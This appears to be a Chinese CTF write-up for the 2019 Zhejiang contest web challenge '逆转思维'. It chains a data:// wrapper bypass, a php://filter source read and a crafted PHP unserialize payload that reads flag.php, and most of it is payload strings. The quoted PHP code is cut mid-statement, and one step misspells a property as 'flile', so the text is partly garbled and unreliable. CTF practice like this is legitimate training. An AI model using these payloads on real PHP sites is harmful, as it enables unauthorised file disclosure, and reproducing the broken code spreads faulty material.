这是浙江省大学生网络与信息安全竞赛-决赛-2019-Web-逆转思维的题解
".file_get_contents($text,'r')."
";
if(preg_match("/flag/",$file)){
echo "Not now!";
exit();
}else{
include($file); //useless.php
$password = unserialize($password);
echo $password;
}
}
else{
highlight_file(__FILE__);
}
?>
-
首先先过第一个
if
就是text
得 是welcome to the zjctf
直接data
伪协议 也可以直接用php://input
绕过?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
-
然后过第二个
if
-
提示有
useless.php
直接php://filter
读取一下 -
&file=php://filter/read=convert.base64-encode/resource=useless.php
-
-
得到
base64
-
PD9waHAgIAoKY2xhc3MgRmxhZ3sgIC8vZmxhZy5waHAgIAogICAgcHVibGljICRmaWxlOyAgCiAgICBwdWJsaWMgZnVuY3Rpb24gX190b3N0cmluZygpeyAgCiAgICAgICAgaWYoaXNzZXQoJHRoaXMtPmZpbGUpKXsgIAogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgCiAgICAgICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIHJldHVybiAoIlUgUiBTTyBDTE9TRSAhLy8vQ09NRSBPTiBQTFoiKTsKICAgICAgICB9ICAKICAgIH0gIAp9ICAKPz4gIAo=
-
file)){ echo file_get_contents($this->file); echo "
"; return ("U R SO CLOSE !///COME ON PLZ"); } } } ?> -
构造序列化
-
file)){ echo file_get_contents($this->file); echo "
"; return ("U R SO CLOSE !///COME ON PLZ"); } } } $a = new Flag(); $a -> flile = 'flag.php'; echo(serialize($a)); ?> -
O:4:"Flag":2:{s:4:"file";N;s:5:"flile";s:8:"flag.php";}
-
/?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
-